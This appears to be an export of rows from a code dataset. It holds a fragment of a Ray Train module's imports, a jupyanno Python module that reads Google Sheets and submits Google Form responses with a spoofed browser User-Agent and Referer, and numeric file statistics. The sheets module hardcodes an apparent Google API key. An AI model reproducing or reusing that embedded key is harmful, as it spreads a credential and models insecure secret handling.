from ray.train.session import (get_dataset_shard, local_rank, load_checkpoint,
report, save_checkpoint, world_rank, world_size)
from ray.train.trainer import Trainer, TrainingIterator
__all__ = [
"BackendConfig", "CheckpointStrategy", "get_dataset_shard",
"load_checkpoint", "local_rank", "report", "save_checkpoint",
"TrainingIterator", "TrainingCallback", "Trainer", "world_rank",
"world_size"
]
| 42.214286 | 79 | 0.749577 | 64 | 591 | 6.640625 | 0.375 | 0.082353 | 0.141176 | 0.084706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153976 | 591 | 13 | 80 | 45.461538 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0.258883 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
6b3deda0113b8eb8f9bdf6272cc95e4fe0c53714
| 2,743 |
py
|
Python
|
jupyanno/sheets.py
|
betatim/jupyanno
|
11fbb1825c8e6966260620758768e0e1fa5cecc9
|
[
"Apache-2.0"
] | 23 |
2018-08-24T16:48:20.000Z
|
2021-02-26T02:52:40.000Z
|
jupyanno/sheets.py
|
L3-data/jupyanno
|
6f6ec37e88b4d92f00bc359e7e39157b6b7f0eb5
|
[
"Apache-2.0"
] | 73 |
2018-08-13T07:56:15.000Z
|
2018-10-09T13:55:20.000Z
|
jupyanno/sheets.py
|
L3-data/jupyanno
|
6f6ec37e88b4d92f00bc359e7e39157b6b7f0eb5
|
[
"Apache-2.0"
] | 4 |
2018-08-13T07:55:50.000Z
|
2020-09-30T12:04:27.000Z
|
"""Code for reading and writing results to google sheets"""
from bs4 import BeautifulSoup
import requests
import warnings
import json
import pandas as pd
from six.moves.urllib.parse import urlparse, parse_qs
from six.moves.urllib.request import urlopen
_CELLSET_ID = "AIzaSyC8Zo-9EbXgHfqNzDxVb_YS_IIZBWtvoJ4"
def get_task_sheet(in_task):
return get_sheet_as_df(sheet_api_url(in_task.sheet_id), _CELLSET_ID)
def get_sheet_as_df(base_url, kk, columns="A:AG"):
"""
Gets the sheet as a list of Dicts (directly importable to Pandas)
:return:
"""
try:
# TODO: we should probably get the whole sheet
all_vals = "{base_url}/{cols}?key={kk}".format(base_url=base_url,
cols=columns,
kk=kk)
t_data = json.loads(urlopen(all_vals).read().decode('latin1'))[
'values']
frow = t_data.pop(0)
return pd.DataFrame([
dict([(key, '' if idx >= len(irow) else irow[idx])
for idx, key in enumerate(frow)]) for irow in
t_data])
except IOError as e:
warnings.warn(
'Sheet could not be accessed, check internet connectivity, \
proxies and permissions: {}'.format(
e))
return pd.DataFrame([{}])
def sheet_api_url(sheet_id):
return "https://sheets.googleapis.com/v4/spreadsheets/{id}/values".format(
id=sheet_id)
def get_questions(in_url):
res = urlopen(in_url)
soup = BeautifulSoup(res.read(), 'html.parser')
def get_names(f):
return [v for k, v in f.attrs.items() if 'label' in k]
def get_name(f):
return get_names(f)[0] if len(
get_names(f)) > 0 else 'unknown'
all_questions = soup.form.findChildren(
attrs={'name': lambda x: x and x.startswith('entry.')})
return {get_name(q): q['name'] for q in all_questions}
def submit_response(form_url, cur_questions, verbose=False, **answers):
submit_url = form_url.replace('/viewform', '/formResponse')
form_data = {'draftResponse': [],
'pageHistory': 0}
for v in cur_questions.values():
form_data[v] = ''
for k, v in answers.items():
if k in cur_questions:
form_data[cur_questions[k]] = v
else:
warnings.warn('Unknown Question: {}'.format(k), RuntimeWarning)
if verbose:
print(form_data)
user_agent = {'Referer': form_url,
'User-Agent': "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537\
.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36"}
return requests.post(submit_url, data=form_data, headers=user_agent)
| 33.45122 | 79 | 0.606635 | 367 | 2,743 | 4.370572 | 0.427793 | 0.018703 | 0.016833 | 0.022444 | 0.009975 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018063 | 0.273423 | 2,743 | 81 | 80 | 33.864198 | 0.786754 | 0.063434 | 0 | 0 | 0 | 0.016949 | 0.101415 | 0.02555 | 0 | 0 | 0 | 0.012346 | 0 | 1 | 0.118644 | false | 0 | 0.118644 | 0.067797 | 0.372881 | 0.016949 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.